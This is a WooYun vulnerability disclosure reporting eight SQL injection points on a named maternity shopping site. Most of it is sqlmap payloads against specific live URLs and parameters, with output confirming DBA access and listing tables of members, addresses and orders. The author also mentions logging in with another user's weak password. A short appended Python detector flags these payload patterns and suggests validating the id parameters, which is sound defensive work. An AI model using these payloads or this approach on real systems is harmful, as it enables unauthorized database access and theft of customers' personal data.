Vulnerability Summary

Defect ID: wooyun-2015-0156602

Title: Another sub-site of 十月妈咪 (Octmami) has multiple SQL injections after login (DBA privileges + tens of thousands of users + 5 databases)

Vendor: 十月妈咪

Author: 路人甲

Submitted: 2015-11-30 15:34

Fix deadline: 2016-01-14 15:36

Disclosed: 2016-01-14 15:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2016-01-14: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Register a user, log in, capture the requests, and you can find quite a few injection points.
This was only done to finish the test; WooYun treats this as a small vendor anyway, and the vendor never comes to claim reports, so this is just for the record. It cost several days of being logged in because I added --delay 60, since the site frequently died when accessed too often.

Detailed description:

Since I found a user "test" with a weak password, I did not bother registering.
Injection point 1:
http://m.octmami.com/detail/specproduct (POST)
goods_id=5371&spec=2-24 28-389

sqlmap identified the following injection points with a total of 231 HTTP(s) requests:
---
Place: POST
Parameter: goods_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: goods_id=5371 AND 5139=5139&spec=2-24 28-389
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: goods_id=5371 AND (SELECT 8646 FROM(SELECT COUNT(*),CONCAT(0x7162687a71,(SELECT (CASE WHEN (8646=8646) THEN 1 ELSE 0 END)),0x71666f6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&spec=2-24 28-389
---
[21:53:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[21:53:33] [INFO] fetching current user
[21:53:33] [INFO] retrieved: chen@%
current user: 'chen@%'
[21:53:33] [INFO] fetching current database
[21:53:33] [INFO] retrieved: ecstore
current database: 'ecstore'
[21:53:33] [INFO] testing if current user is DBA
[21:53:33] [INFO] fetching current user
current user is DBA: True
available databases [5]:
[*] ecstore
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: ecstore
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| oct_product_price_snapshot | 227857 |
| oct_cps_visit_log | 153509 |
| oct_coupon_list | 82040 |
| sdb_image_image | 72442 |
| sdb_b2c_comment_goods_point | 27465 |
| sdb_operatorlog_normallogs | 21841 |
| oct_cps_log | 19392 |
| sdb_pam_members | 16330 |
| sdb_b2c_order_log | 15534 |
| sdb_b2c_members | 14710 |
| sdb_image_image_attach | 13288 |
| sdb_b2c_member_comments | 12679 |
| sdb_desktop_tag_rel | 11996 |
| sdb_b2c_order_items | 10403 |
| sdb_b2c_order_objects | 10375 |
| sdb_base_kvstore | 9847 |
| sdb_dbeav_meta_value_text | 9013 |
| sdb_pam_log_desktop | 7949 |
| sdb_b2c_products | 7435 |
| oct_verification_code | 6610 |
| oct_member_point | 6587 |
| oct_advertisement_items | 5927 |
| sdb_b2c_member_coupon | 5762 |
| sdb_ectools_analysis_logs | 5758 |
| oct_member_wap_info | 5717 |
| sdb_dbeav_meta_value_longtext | 5594 |
| sdb_b2c_goods_keywords | 5445 |
| oct_b2c_goods_spec_index | 5344 |
| sdb_ectools_order_bills | 5192 |
| sdb_b2c_goods | 5179 |
| sdb_ectools_payments | 4788 |
| sdb_b2c_order_pmt | 4688 |
| oct_member_weixin_bind | 4687 |
| sdb_b2c_orders | 4677 |
| sdb_b2c_delivery_items | 3888 |
| sdb_ectools_regions | 3303 |
| sdb_b2c_member_addrs | 3262 |
| sdb_order_task_log | 3155 |
| oct_recommend_loaction | 2752 |
| sdb_b2c_order_delivery | 2569 |
| sdb_b2c_delivery | 2564 |
| sdb_dbeav_meta_value_int | 2315 |
| oct_member_weixin_bind3 | 2173 |
| oct_turn_table | 1975 |
| sdb_b2c_goods_type_props_value | 1628 |
| sdb_b2c_goods_spec_index | 1505 |
| sdb_couponlog_order_coupon_ref | 1492 |
| sdb_couponlog_order_coupon_user | 1492 |
| sdb_b2c_cart_objects | 1335 |
| sdb_apiactionlog_apilog | 1304 |
| sdb_b2c_type_brand | 1256 |
| sdb_desktop_recycle | 1209 |
| oct_prompt_limit | 947 |
| sdb_b2c_member_point | 851 |
| sdb_base_app_content | 784 |
| oct_search_words | 719 |
| sdb_base_setting | 705 |
| oct_banner_info | 671 |
| oct_banner_location | 671 |
| sdb_b2c_member_goods | 619 |
| sdb_base_cache_expires | 615 |
| sdb_b2c_sell_logs | 574 |
| sdb_b2c_spec_values | 469 |
| sdb_starbuy_count_member_buy | 437 |
| sdb_ectools_refunds | 404 |
| sdb_logisticstrack_logistic_log | 367 |
| sdb_b2c_brand | 337 |
| sdb_importexport_task | 322 |
| oct_draw_list | 320 |
| sdb_aftersales_return_product | 318 |
| sdb_site_widgets_instance | 312 |
| oct_advertisement | 309 |
| sdb_b2c_goods_type_props | 298 |
| oct_order_pmt | 277 |
| sdb_desktop_menus | 258 |
| sdb_b2c_order_cancel_reason | 237 |
| oct_sync_log | 214 |
| oct_cps_valuation | 208 |
| oct_feedback | 205 |
| oct_coupon_order_item | 187 |
| oct_brand_special | 153 |
| oct_stores | 140 |
| oct_cps_put | 123 |
| oct_stores_image | 99 |
| sdb_content_article_bodys | 99 |
| oct_special_product | 98 |
| sdb_dbeav_meta_value_varchar | 97 |
| sdb_b2c_goods_cat | 94 |
| sdb_b2c_goods_rate | 93 |
| sdb_site_themes_file | 89 |
| sdb_desktop_tag | 83 |
| sdb_operatorlog_register | 79 |
| vw_goods_cat | 78 |
| sdb_b2c_goods_type | 77 |
| sdb_b2c_goods_type_spec | 74 |
| sdb_b2c_goods_lv_price | 68 |
| sdb_content_article_indexs | 68 |
| sdb_site_themes_tmpl | 68 |
| sdb_site_widgets | 62 |
| oct_service_call | 58 |
| oct_cps_case | 52 |
| oct_coupon_cate | 49 |
| oct_coupon_rule | 49 |
| sdb_base_apps | 49 |
| sdb_desktop_hasrole | 44 |
| sdb_desktop_users | 44 |
| oct_prompt_flash | 43 |
| sdb_pam_account | 43 |
| oct_coupon_grant | 41 |
| sdb_starbuy_special_goods | 41 |
| oct_banner_dimension | 40 |
| oct_recommend_comment_cat | 36 |
| sdb_b2c_goods_promotion_ref | 34 |
| sdb_b2c_sales_rule_order | 33 |
| sdb_b2c_dlycorp | 27 |
| sdb_b2c_goods_virtual_cat | 27 |
| sdb_b2c_member_systmpl | 26 |
| sdb_site_modules | 25 |
| sdb_b2c_coupons | 21 |
| sdb_b2c_specification | 20 |
| oct_recommend_dimension | 17 |
| sdb_openid_openid | 17 |
| sdb_pam_auth | 17 |
| sdb_system_queue_mysql | 17 |
| sdb_wap_modules | 17 |
| sdb_dbeav_meta_register | 16 |
| sdb_desktop_roles | 16 |
| sdb_desktop_filter | 15 |
| sdb_starbuy_promotions_type | 15 |
| oct_recommend_comment_define | 12 |
| sdb_base_crontab | 12 |
| sdb_wap_widgets | 12 |
| oct_recommend_comment_info | 10 |
| sdb_b2c_member_advance | 9 |
| sdb_content_article_nodes | 9 |
| oct_search_hot | 8 |
| sdb_b2c_member_lv | 8 |
| sdb_starbuy_special | 8 |
| oct_special_info | 7 |
| sdb_site_seo | 7 |
| sdb_b2c_reship_items | 6 |
| sdb_gift_ref | 6 |
| sdb_site_menus | 6 |
| oct_channel | 5 |
| oct_employees | 5 |
| oct_goods_seckill | 5 |
| oct_prompt_activity | 5 |
| sdb_site_themes | 5 |
| sdb_wap_widgets_instance | 5 |
| oct_admin_group | 4 |
| sdb_b2c_dlytype | 4 |
| sdb_b2c_reship | 4 |
| sdb_starbuy_special_remind | 4 |
| oct_location | 3 |
| sdb_b2c_comment_goods_type | 3 |
| sdb_base_network | 3 |
| sdb_ectools_analysis | 3 |
| oct_agent | 2 |
| sdb_b2c_orders_recommend | 2 |
| sdb_wap_themes_file | 2 |
| sdb_wap_themes_tmpl | 2 |
| oct_goods_ads | 1 |
| sdb_b2c_goods_store_prompt | 1 |
| sdb_ectools_currency | 1 |
| sdb_gift_cat | 1 |
| sdb_site_explorers | 1 |
| sdb_site_link | 1 |
| sdb_wap_explorers | 1 |
| sdb_wap_themes | 1 |
+---------------------------------+---------+
| sdb_pam_members | 16330 |
| sdb_b2c_members | 14710 |
| sdb_b2c_member_addrs | 3262 |
| sdb_desktop_users | 44 |
| sdb_couponlog_order_coupon_user | 1492 |


1.jpg


2.jpg


Injection point 2:
http://m.octmami.com/detail/checkstore (POST)
product_id=9223&buy_number=2
product_id is injectable

sqlmap identified the following injection points with a total of 152 HTTP(s) requests:
---
Place: POST
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=9223 AND 3883=3883&buy_number=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=9223 AND (SELECT 7492 FROM(SELECT COUNT(*),CONCAT(0x7177637671,(SELECT (CASE WHEN (7492=7492) THEN 1 ELSE 0 END)),0x7174636d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&buy_number=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: product_id=9223 AND SLEEP(5)&buy_number=2
---
[19:44:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[19:44:11] [INFO] fetching current user
[19:44:11] [INFO] retrieved: chen@%
current user: 'chen@%'
[19:44:11] [INFO] fetching current database
[19:44:12] [INFO] retrieved: ecstore
current database: 'ecstore'
[19:44:12] [INFO] testing if current user is DBA
[19:44:12] [INFO] fetching current user
current user is DBA: True


3.jpg


Injection point 3:
http://m.octmami.com/cart/insert (POST)
product_id=9222&quantity=2&quantity_type=add
product_id is injectable; quantity looks injectable too, but I did not test it further.

[19:46:55] [INFO] testing connection to the target URL
[19:46:56] [INFO] heuristics detected web page charset 'ascii'
[19:46:56] [INFO] testing if the target URL is stable. This can take a couple of seconds
[19:46:57] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[19:47:03] [INFO] searching for dynamic content
[19:47:03] [INFO] dynamic content marked for removal (1 region)
[19:47:03] [INFO] testing if POST parameter 'product_id' is dynamic
[19:47:03] [INFO] confirming that POST parameter 'product_id' is dynamic
[19:47:04] [WARNING] POST parameter 'product_id' does not appear dynamic
[19:47:04] [INFO] heuristic (basic) test shows that POST parameter 'product_id' might be injectable (possible DBMS: 'MySQL')
[19:47:04] [INFO] testing for SQL injection on POST parameter 'product_id'
[19:47:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:47:04] [WARNING] reflective value(s) found and filtering out
[19:47:05] [INFO] POST parameter 'product_id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:47:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:47:05] [INFO] POST parameter 'product_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[19:47:05] [INFO] testing 'MySQL inline queries'
[19:47:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:47:05] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[19:47:06] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:47:16] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[19:47:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:47:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:47:19] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[19:47:23] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
POST parameter 'product_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[19:47:30] [INFO] testing if POST parameter 'quantity' is dynamic
[19:47:30] [INFO] confirming that POST parameter 'quantity' is dynamic
[19:47:30] [INFO] POST parameter 'quantity' is dynamic
[19:47:30] [INFO] heuristic (basic) test shows that POST parameter 'quantity' might be injectable (possible DBMS: 'MySQL')
[19:47:30] [INFO] testing for SQL injection on POST parameter 'quantity'
[19:47:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:47:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:47:34] [INFO] testing 'MySQL inline queries'
[19:47:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:47:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:47:37] [INFO] testing 'MySQL UNION query (95) - 1 to 10 columns'
[19:47:58] [INFO] testing 'Generic UNION query (95) - 1 to 10 columns'
[19:48:11] [WARNING] POST parameter 'quantity' is not injectable
[19:48:11] [INFO] testing if POST parameter 'quantity_type' is dynamic
[19:48:11] [INFO] confirming that POST parameter 'quantity_type' is dynamic
[19:48:11] [WARNING] POST parameter 'quantity_type' does not appear dynamic
[19:48:11] [INFO] testing for SQL injection on POST parameter 'quantity_type'
[19:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:48:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:48:14] [INFO] testing 'MySQL inline queries'
[19:48:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:48:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:48:16] [INFO] testing 'MySQL UNION query (95) - 1 to 10 columns'
[19:48:34] [INFO] testing 'Generic UNION query (95) - 1 to 10 columns'
[19:48:50] [WARNING] POST parameter 'quantity_type' is not injectable
sqlmap identified the following injection points with a total of 404 HTTP(s) requests:
---
Place: POST
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=9222 AND 5197=5197&quantity=2&quantity_type=add
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=9222 AND (SELECT 7879 FROM(SELECT COUNT(*),CONCAT(0x7170706771,(SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0 END)),0x716e676171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2&quantity_type=add
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: product_id=9222 AND SLEEP(5)&quantity=2&quantity_type=add
---
[19:48:51] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[19:48:51] [INFO] fetching current user
[19:48:51] [INFO] retrieved: chen@%
current user: 'chen@%'
[19:48:51] [INFO] fetching current database
[19:48:51] [INFO] retrieved: ecstore
current database: 'ecstore'
[19:48:51] [INFO] testing if current user is DBA
[19:48:51] [INFO] fetching current user
current user is DBA: True


4.jpg


Injection point 4:
http://m.octmami.com/order/confirm?product_id=9222&quantity=2 (GET)
Again product_id, this time injectable via GET

[19:53:02] [WARNING] GET parameter 'quantity' is not injectable
sqlmap identified the following injection points with a total of 350 HTTP(s) requests:
---
Place: GET
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=9222 AND 4688=4688&quantity=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=9222 AND (SELECT 3460 FROM(SELECT COUNT(*),CONCAT(0x7162786c71,(SELECT (CASE WHEN (3460=3460) THEN 1 ELSE 0 END)),0x71656d6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: product_id=-4908 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786c71,0x4b43476d754b62487872,0x71656d6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&quantity=2
---
[19:53:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[19:53:02] [INFO] fetching current user
current user: 'chen@%'
[19:53:02] [INFO] fetching current database
current database: 'ecstore'
[19:53:03] [INFO] testing if current user is DBA
[19:53:03] [INFO] fetching current user
current user is DBA: True


5.jpg


Injection point 5:
http://m.octmami.com/detail/index?goods=5371&prodct=9222.html (GET)
goods is injectable

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: goods
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: goods=5371 AND 7381=7381&prodct=9222.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: goods=5371 AND (SELECT 1047 FROM(SELECT COUNT(*),CONCAT(0x716d756471,(SELECT (CASE WHEN (1047=1047) THEN 1 ELSE 0 END)),0x71726d7771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&prodct=9222.html
---
[10:47:54] [INFO] testing MySQL
[10:47:54] [INFO] confirming MySQL
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
[10:48:58] [WARNING] reflective value(s) found and filtering out
[10:48:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL >= 5.0.0
[10:48:58] [INFO] fetching current user
[10:49:59] [INFO] retrieved: chen@%
current user: 'chen@%'
[10:49:59] [INFO] fetching current database
[10:50:59] [INFO] retrieved: ecstore
current database: 'ecstore'
[10:50:59] [INFO] testing if current user is DBA
[10:50:59] [INFO] fetching current user
current user is DBA: True


6.jpg


Injection point 6:
http://m.octmami.com/cart/delete (POST)
quantity_type=add&goods_id=5371&product_id=9222&quantity=2
goods_id, product_id and quantity here are probably injectable as well, but since this is a delete action I did not test it; deleting someone's data would not be good.
Injection point 7:
http://m.octmami.com/member/orderinfo.html?order_id=150125210459821 (GET)

[13:50:22] [INFO] GET parameter 'order_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'order_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Place: GET
Parameter: order_id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: order_id=150125210459821) AND (SELECT 8618 FROM(SELECT COUNT(*),CONCAT(0x717a727771,(SELECT (CASE WHEN (8618=8618) THEN 1 ELSE 0 END)),0x7165657571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5615=5615
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: order_id=150125210459821) UNION ALL SELECT NULL,NULL,CONCAT(0x717a727771,0x4b494c5855476370726c,0x7165657571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[13:56:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[13:56:09] [INFO] fetching current user
current user: 'chen@%'
[13:57:18] [INFO] fetching current database
current database: 'ecstore'
[13:58:20] [INFO] testing if current user is DBA
[13:58:20] [INFO] fetching current user
current user is DBA: True


7.jpg


Injection point 8:
http://m.octmami.com/addr/update?addr_id=79 (GET)
addr_id is injectable

GET parameter 'addr_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Place: GET
Parameter: addr_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addr_id=79 AND 6350=6350
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: addr_id=79 AND (SELECT 7293 FROM(SELECT COUNT(*),CONCAT(0x71616b6471,(SELECT (CASE WHEN (7293=7293) THEN 1 ELSE 0 END)),0x716a7a6471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[16:02:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[16:02:40] [INFO] fetching current user
[16:03:40] [INFO] retrieved: chen@%
current user: 'chen@%'
[16:03:40] [INFO] fetching current database
[16:04:50] [INFO] retrieved: ecstore
current database: 'ecstore'
[16:04:50] [INFO] testing if current user is DBA
[16:04:50] [INFO] fetching current user
[16:06:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[16:07:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
current user is DBA: True


8.jpg
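A defender-side check for the request patterns visible in the sqlmap output above, added here as an example and not part of the original report: it decodes each request's query string and POST body, flags the numeric id parameters this report shows being used as database keys (goods_id, product_id, addr_id, order_id, goods) when they carry anything other than a plain integer, and tags the payload families sqlmap reported (boolean-blind, error-based, time-based, UNION). The sample requests are constructed from the report's payloads, and a body-aware log source (WAF or application log) is assumed, since a plain access log does not record POST bodies.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters this report shows being used as numeric database keys.
NUMERIC_PARAMS = {"goods_id", "product_id", "addr_id", "order_id", "goods", "quantity"}

# Signatures for the payload families in the sqlmap output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"FLOOR\(RAND\(0\)\*2\)", re.I),
    "time-blind": re.compile(r"\bSLEEP\(\d+\)", re.I),
    "union": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
}


def classify_request(target, body=""):
    """Return [(param, sorted labels)] for one request's query string and body."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in pairs:
        labels = {label for label, rx in SIGNATURES.items() if rx.search(value)}
        # An id that is not a plain integer is suspicious even without a known signature.
        if name in NUMERIC_PARAMS and not value.isdigit():
            labels.add("non-numeric-id")
        if labels:
            findings.append((name, sorted(labels)))
    return findings


def scan_requests(requests):
    """Run classify_request over (method, target, body) tuples; return a flat hit list."""
    hits = []
    for method, target, body in requests:
        for param, labels in classify_request(target, body):
            hits.append((method, urlsplit(target).path, param, labels))
    return hits


# Constructed sample (assumed log source): URL-encoded forms of the report's payloads
# plus two benign requests that must not be flagged.
SAMPLE_REQUESTS = [
    ("POST", "/detail/specproduct", "goods_id=5371%20AND%205139%3D5139&spec=2-24+28-389"),
    ("POST", "/detail/checkstore", "product_id=9223%20AND%20SLEEP(5)&buy_number=2"),
    ("GET", "/order/confirm?product_id=-4908%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23&quantity=2", ""),
    ("GET", "/member/orderinfo.html?order_id=150125210459821)%20AND%20(SELECT%208618%20FROM"
            "(SELECT%20COUNT(*),CONCAT(0x717a727771,(SELECT%20(CASE%20WHEN%20(8618=8618)%20THEN%201"
            "%20ELSE%200%20END)),0x7165657571,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA."
            "CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(5615=5615", ""),
    ("GET", "/detail/index?goods=5371&prodct=9222.html", ""),
    ("POST", "/cart/insert", "product_id=9222&quantity=2&quantity_type=add"),
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

The same non-integer check on the id parameters is also the cheapest server-side fix for these endpoints: reject the request before the value reaches the query.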

Proof of vulnerability:

As above

Fix recommendation:

Filter (validate) the input parameters

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Vendor could not be contacted, or vendor actively refused